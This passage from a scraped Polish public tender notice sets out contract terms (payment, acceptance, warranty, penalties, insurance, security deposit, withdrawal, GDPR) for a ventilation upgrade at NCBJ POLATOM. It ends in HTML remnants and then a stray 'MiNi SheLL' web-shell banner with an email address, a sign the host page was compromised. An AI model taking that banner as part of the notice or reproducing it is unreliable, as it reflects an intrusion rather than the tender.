postępowania przetargowego: Nr sprawy: 12/P/2020, na podstawie umowy Nr DZP/……../2020, identyfikator dostawy,•	wyrażone w złotych wartości netto, stawki i kwoty podatku VAT oraz wartości brutto,•	dane Zamawiającego i Wykonawcy,•	numer rachunku bankowego Wykonawcy, na które zostanie przekazane wynagrodzenie z tytułu zrealizowania zamówienia,•	termin płatności.6. W przypadku nieterminowego uregulowania przez Zamawiającego faktury VAT Wykonawca może naliczać ustawowe odsetki za opóźnienie.7. Wykonawca zapewni ciągłość realizacji i finansowania inwestycji w całym okresie trwania niniejszej umowy.§ 61. Strony zgodnie postanawiają, że po wykonaniu niniejszej Umowy przeprowadzony będzie końcowy odbiór robót budowlanych.2. Z czynności odbioru końcowego sporządzony zostanie protokół podpisany przez Strony umowy, który stanowić będzie załącznik do faktury. Termin podpisania protokołu odbioru końcowego lub zgłoszenia zastrzeżeń, co do prawidłowego wykonania przedmiotu niniejszej umowy, wynosi 14 dni roboczych, licząc od dnia przystąpienia do odbioru końcowego.3. W przypadku pisemnych zastrzeżeń Zamawiającego co do prawidłowego wykonania przedmiotu niniejszej umowy, Zamawiający określi szczegółowo te zastrzeżenia i wyznaczy Wykonawcy dodatkowy termin do usunięcia usterek w wykonaniu przedmiotu niniejszej umowy. Po upływie dodatkowego terminu Strony przystępują do ponownego odbioru robót. W przypadku ponownych uzasadnionych zastrzeżeń Zamawiającego, Zamawiający ma prawo do odstąpienia od niniejszej umowy albo może powierzyć usunięcie usterek w wykonaniu przedmiotu niniejszej umowy innej osobie na koszt i niebezpieczeństwo Wykonawcy.4. Jeżeli Zamawiający z własnej winy nie przystąpi do odbioru robót i podpisania protokołu lub sporządzenia zastrzeżeń, w terminie określonym w pkt. 2 i 3 niniejszego paragrafu, Wykonawca protokolarnie ustali stan przedmiotu odbioru przez powołaną przez siebie komisję. Protokół, o którym mowa wyżej, stanowić będzie podstawę do wystawienia faktury i zapłaty wynagrodzenia. 5. O dokonaniu odbioru, o którym mowa w pkt. 4 niniejszego paragrafu, Wykonawca powiadomi na piśmie Zamawiającego i dostarczy mu protokół, nie później niż w następnym dniu roboczym po dokonaniu odbioru.6. Na 7 roboczych dni przed przystąpieniem do odbioru końcowego Wykonawca dostarczy Zamawiającemu dokumentację powykonawczą (atesty, certyfikaty na zastosowane materiały). 7. Za datę wykonania przez Wykonawcę zobowiązań wynikających z niniejszej umowy uznaje się datę protokołu końcowego odbioru przedmiotu umowy podpisanego bez zastrzeżeń przez Strony umowy.§ 71. Wykonawca udziela gwarancji na okres:60 miesięcy od dnia podpisania bez uwag końcowego protokołu odbioru wykonania przedmiotu umowy.2. Wykonawca zobowiązuje się usunąć na swój koszt wady i usterki stwierdzone w przedmiocie niniejszej umowy w okresie gwarancji — w terminie technicznie i organizacyjnie uzasadnionym, obustronnie uzgodnionym przez Strony umowy, nie dłuższym jednak niż 10 dni roboczych od dnia wskazania wady, usterki przez Zamawiającego.3. W przypadku, gdy Wykonawca nie usunie wad i usterek w terminie obustronnie uzgodnionym przez Strony umowy, Zamawiający poza uprawnieniami przysługującymi mu na podstawie Kodeksu Cywilnego, może powierzyć usunięcie wad i usterek podmiotowi trzeciemu na koszt Wykonawcy (wykonanie zastępcze).4. Wszystkie reklamacje będą zgłaszane przez Zamawiającego pisemnie, najpóźniej do dnia upływu okresu gwarancji, a Wykonawca będzie potwierdzał przyjęcie zgłoszenia.5. W zakresie nieuregulowanym w niniejszym paragrafie stosuje się przepisy Kodeksu Cywilnego.§ 8Wykonawca zapłaci Zamawiającemu kary umowne:1. Za opóźnienie w wykonaniu przedmiotu zamówienia – w wysokości 0,25% (słownie: dwadzieścia pięć setnych procenta) wynagrodzenia brutto określonego w § 5 niniejszej umowy za każdy dzień opóźnienia.2. Za opóźnienie w usunięciu wad stwierdzonych przy odbiorze lub ujawnionych w okresie rękojmi lub gwarancji - w wysokości 0,25% (słownie: dwadzieścia pięć setnych procenta) wynagrodzenia brutto określonego w § 5 niniejszej umowy za każdy dzień opóźnienia.3. W razie odstąpienia przez Zamawiającego od umowy z przyczyn leżących po stronie Wykonawcy lub odstąpienia od umowy przez Wykonawcę, z przyczyn leżących po stronie Wykonawcy – w wysokości 30% (słownie: trzydzieści procent) wynagrodzenia brutto określonego w § 5 niniejszej umowy.4. Za nieprzedłożenie do akceptacji w wyznaczonym terminie projektu umowy o podwykonawstwo, której przedmiotem są roboty budowlane lub projektu jej zmiany, oraz potwierdzonej za zgodność z oryginałem kopii zawartej umowy o podwykonawstwo lub jej zmiany albo brak wymaganej przez Zamawiającego zmiany umowy o podwykonawstwo w zakresie terminu zapłaty, w wysokości 0,1% (słownie: jedna dziesiąta procenta) wynagrodzenia brutto określonego w § 5 niniejszej umowy za każdy dzień opóźnienia.5. Za nieprzedłożenie w wyznaczonym terminie kopii umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi celem weryfikacji terminu zapłaty w wysokości 0,1% (słownie: jedna dziesiąta procenta) wynagrodzenia brutto określonego w § 5 niniejszej umowy za każdy dzień opóźnienia.6. W przypadku zmiany każdego rodzaju podwykonawcy lub wprowadzenia podwykonawcy nie wskazanego w ofercie bez akceptacji Zamawiającego, będą miały zastosowanie zapisy § 8 pkt 4 - 5 niniejszej umowy.7. W przypadku niedostarczenia Zamawiającemu potwierdzenia przez Wykonawcę faktu zapłaty należnego wynagrodzenia wszystkim podwykonawcom i dalszym podwykonawcom, Zamawiający dokona bezpośredniej zapłaty należności dla podwykonawców i dalszych podwykonawców a kwotę tę potrąci z wynagrodzenia należnego Wykonawcy (zgodnie z zasadami opisanymi w SIWZ).8. Wykonawca upoważnia Zamawiającego do potrącenia naliczonych kar umownych z wynagrodzenia należnego Wykonawcy lub z Zabezpieczenia Należytego Wykonania Umowy, o którym mowa w § 10 umowy.9. W przypadku poniesienia przez Zamawiającego szkody przewyższającej wysokość zastrzeżonych kar umownych Zamawiający może dochodzić odszkodowania na zasadach ogólnych wynikających z Kodeksu cywilnego.10. W uzasadnionych przypadkach Zamawiający może odstąpić od naliczania kar umownych.§ 91. Wykonawca ponosi pełną odpowiedzialność za szkody wyrządzone Zamawiającemu lub innym podmiotom wynikłe z niedochowania należytej staranności Wykonawcy lub podwykonawców w trakcie realizacji niniejszej umowy. 2. Wykonawca oświadcza, że posiada i załączy kopię ważnej i opłaconej umowy ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej i posiadanego mienia w wysokości:300 000,00 PLN (słownie: trzysta tysięcy złotych), ważną do dnia ………… r. Wykonawca zobowiązuje się do utrzymywania ważności w/w umowy ubezpieczenia przez cały okres wykonania przedmiotu umowy.3. W razie wydłużenia czasu realizacji niniejszej umowy ponad czas obowiązywania umowy ubezpieczenia, Wykonawca zobowiązuje się do przedłużenia ubezpieczenia, przedstawiając Zamawiającemu przedłużoną umowę ubezpieczenia, na co najmniej miesiąc przed wygaśnięciem poprzedniej umowy ubezpieczenia. W przypadku niedokonania przedłużenia umowy ubezpieczenia Zamawiający ma prawo odstąpić od niniejszej umowy o zamówienie publiczne.Umowa ubezpieczenia, o której mowa musi zapewnić wypłatę odszkodowania płatnego w złotych polskich, bez ograniczeń. Wykonawca nie jest upoważniony do dokonywania zmian warunków ubezpieczenia bez uprzedniej zgody Zamawiającego wyrażonej na piśmie.§ 101.	Wykonawca przy podpisywaniu niniejszej umowy przedłożył Zamawiającemu dokument potwierdzający wniesienie Zabezpieczenia Należytego Wykonania Umowy w wysokości 10% (słownie: dziesięć procent) wynagrodzenia brutto określonego w § 5 ust. 1 umowy, co stanowi kwotę:………………… PLN(słownie: …………………………………………………………………………….....złotych)zabezpieczenie zostało wniesione w formie: ……………………………………...……………2.	Zabezpieczenie może zostać wykorzystane przez Zamawiającego na pokrycie roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. Zamawiający zobowiązuje się do zwrotu zabezpieczenia, jeżeli nie zostanie ono zarachowane na pokrycie roszczeń Zamawiającego wynikających z niewykonania lub nienależytego wykonania umowy. Zwrot zabezpieczenia należytego wykonania umowy będzie dokonany przy zachowaniu zasad określonych w ustawie Prawo zamówień publicznych.3.	Koszt ustanowienia i zwolnienia Zabezpieczenia Należytego Wykonania Umowy obciąża Wykonawcę.4.	Jeżeli zabezpieczenie wniesione w gwarancjach bankowych lub ubezpieczeniowych albo poręczeniach, a z uwagi na przedłużenie czasu wykonywania umowy, niezależnie od przyczyn tego wydłużenia, wygasłoby przed ich zakończeniem, Wykonawca na 14 dni roboczych przed wygaśnięciem takiego zabezpieczenia ma obowiązek ustanowić odpowiednie nowe zabezpieczenie i wnieść Zamawiającemu.§ 11Stronom przysługuje prawo odstąpienia od niniejszej umowy w następujących przypadkach:1. Zamawiającemu przysługuje prawo do odstąpienia od niniejszej umowy, gdy:a.	zostanie ogłoszona upadłość Wykonawcy lub otwarta likwidacja Wykonawcy;b.	zostanie wydany nakaz zajęcia majątku Wykonawcy, w zakresie uniemożliwiającym wykonywanie przedmiotu niniejszej umowy;c.	Wykonawca nie rozpoczął robót w uzgodnionym terminie bez uzasadnionych przyczyn przez okres 7 roboczych dni lub przerwał je i nie kontynuuje ich pomimo wezwania Zamawiającego złożonego na piśmie;d.	Wykonawca z przyczyn leżących po jego stronie przerwał realizację robót i przerwa ta spowodowała opóźnienie realizacji robót dłużej niż trzydzieści dni kalendarzowych.e.	Wykonawca wykonuje umowę w sposób nienależyty, niezgodnie z jej postanowieniami lub obowiązującymi przepisami, albo też w inny sposób poważnie naruszy zobowiązania umowne, przy czym dla skuteczności odstąpienia Zamawiający winien wyznaczyć Wykonawcy dodatkowy termin, nie krótszy niż 14 dni kalendarzowych, do wykonania umowy zgodnie z jej treścią lub obowiązującymi przepisami z zastrzeżeniem, że w przypadku nieuczynienia przez Wykonawcę zadość wezwaniu uprawniony będzie do odstąpienia od umowy.f.	Wykonawca naruszy w jakikolwiek sposób postanowienia pkt. 4 § 10 niniejszej umowy.g.	Wykonawca nie przedłoży Zamawiającemu umowy z Podwykonawcą, któremu zlecił wykonanie całości lub części zamówieniah.	wystąpiła siła wyższa.2. Wykonawcy przysługuje prawo odstąpienia od niniejszej umowy, jeżeli Zamawiający opóźnia z własnej winy termin przekazania terenu prac remontowych o 7 dni roboczych od daty, w której taka możliwość powstała.3. Odstąpienie od niniejszej umowy powinno nastąpić w formie pisemnej i powinno zawierać uzasadnienie.4. W przypadku odstąpienia od niniejszej umowy Wykonawcę oraz Zamawiającego obciążają następujące obowiązki:a.	w terminie siedmiu dni kalendarzowych od daty doręczenia drugiej Stronie oświadczenia o odstąpieniu od niniejszej umowy Wykonawca, przy udziale Zamawiającego sporządzi szczegółowy protokół inwentaryzacji wykonanych robót według stanu na dzień odstąpienia;b.	Wykonawca zabezpieczy przerwane roboty w zakresie obustronnie uzgodnionym na koszt tej Strony, z winy której nastąpiło odstąpienie od niniejszej umowy, chyba że Strony postanowiły inaczej;c.	Strony sporządzają wykaz tych materiałów, konstrukcji lub urządzeń, które nie mogą być wykorzystane przez Wykonawcę do realizacji innych robót nieobjętych niniejszą umową, w przypadku zerwania umowy z winy Zamawiającego.d.	Wykonawca zgłosi niezwłocznie konieczność dokonania przez Zamawiającego odbiorów robót przerwanych oraz robót zabezpieczających. Ponadto Wykonawca niezwłocznie, a najpóźniej w terminie trzydziestu dni kalendarzowych, usunie z terenu budowy wniesione przez niego urządzenia zaplecza;5. W każdym przypadku odstąpienia od niniejszej umowy Zamawiający zobowiązany jest do:a.	dokonania odbioru robót przerwanych oraz do zapłaty wynagrodzenia za roboty, które zostały prawidłowo wykonane do dnia odstąpienia.b.	rozliczenia się z Wykonawcą z tytułu nierozliczonych w inny sposób uzasadnionych kosztów.c.	przejęcia od Wykonawcy pod swój dozór terenu prac remontowych w ciągu trzydziestu dni kalendarzowych od daty podpisania przez Strony niniejszej umowy. d.	protokołu inwentaryzacji robót w toku wg stanu na dzień odstąpienia. § 12.Wszystkie dodatki, uzupełnienia i zmiany niniejszej umowy wymagają formy pisemnej i podpisów Stron pod rygorem nieważności, przy czym zakazuje się zmian postanowień zawartej umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna z okoliczności opisanych w art. 144 ustawy Pzp.§ 13.1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: a.	administratorem danych osobowych Wykonawcy jest: NCBJ OR POLATOM 05-400 Otwock u. Andrzeja Sołtana 7b.	inspektorem ochrony danych osobowych w NCBJ OR POLATOM jest Pani Ewa Błażejowska e-mail: iod@ncbj.gov.pl, tel. 22 273 22 31.c.	dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr sprawy: 12/P/2020, odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2018 r. poz. 1986 z póżn. zm.), dalej „ustawa Pzp”; d.	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;e.	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; f.	w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;2. Wykonawca posiada:a.	na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych,b.	na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych,c.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,d.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych jego dotyczących narusza przepisy RODO,3. Wykonawcy nie przysługuje:a.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,b.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,c.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.§ 14.Wszystkie spory, kontrowersje lub różnice zdań, które mogą wyniknąć między Stronami z niniejszej umowy lub w związku z nią, odnośnie jej ważności i interpretacji, które nie mogą być załatwione w sposób polubowny, będą rozstrzygane, przez sąd powszechny właściwy miejscowo dla siedziby Zamawiającego.§ 15.1. Integralną częścią niniejszej umowy jest Załącznik nr 1 do umowy, Oferta Wykonawcy, SIWZ wraz z załącznikami oraz umowy z podwykonawcami.2. W sprawach nieuregulowanych niniejszą umową mają zastosowanie przepisy Kodeksu cywilnego, Prawa Budowlanego wraz z przepisami wykonawczymi oraz inne obowiązujące przepisy prawa.3. Umowę niniejszą sporządzono w dwóch jednobrzmiących egzemplarzach, po jednym dla każdej ze Stron.4. Umowa wchodzi w życie z chwilą jej podpisania przez Strony.......................................................... ....................................................... ZAMAWIAJĄCY WYKONAWCA…………………………..……….. …………………………………… Pieczęć firmowa Pieczęć firmowaZałącznik nr 1 do Umowy Pieczęć firmowa WykonawcyOświadczenieW związku z wybraniem mojej firmy do realizacji zamówienia publicznego pn.: „Modernizacja instalacji wentylacji w pomieszczeniach 7D i 11D”.•	Wszystkie prace związane z realizacją zamówienia będą wykonywane z zachowaniem wymogów przepisów bhp, ppoż. oraz ochrony radiologicznej.•	Pracownicy bezpośrednio uczestniczący w wykonywaniu zamówienia posiadają wszystkie wymagane uprawnienia do prac, które będą wykonywać. •	Konsekwencje ewentualnych zaniedbań w przestrzeganiu przepisów bhp ponosi Wykonawca.……………………………………………Data i podpis upoważnionego przedstawiciela Wykonawcy</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Kary umowne określone w umowie. Wniesienie Zabezpieczenia Należytego Wykonania Umowy w wysokości 10% (słownie: dziesięć procent) wynagrodzenia brutto.</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Wszystkie dodatki, uzupełnienia i zmiany niniejszej umowy wymagają formy pisemnej i podpisów Stron pod rygorem nieważności, przy czym zakazuje się zmian postanowień zawartej umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna z okoliczności opisanych w art. 144 ustawy Pzp.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-06-26</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com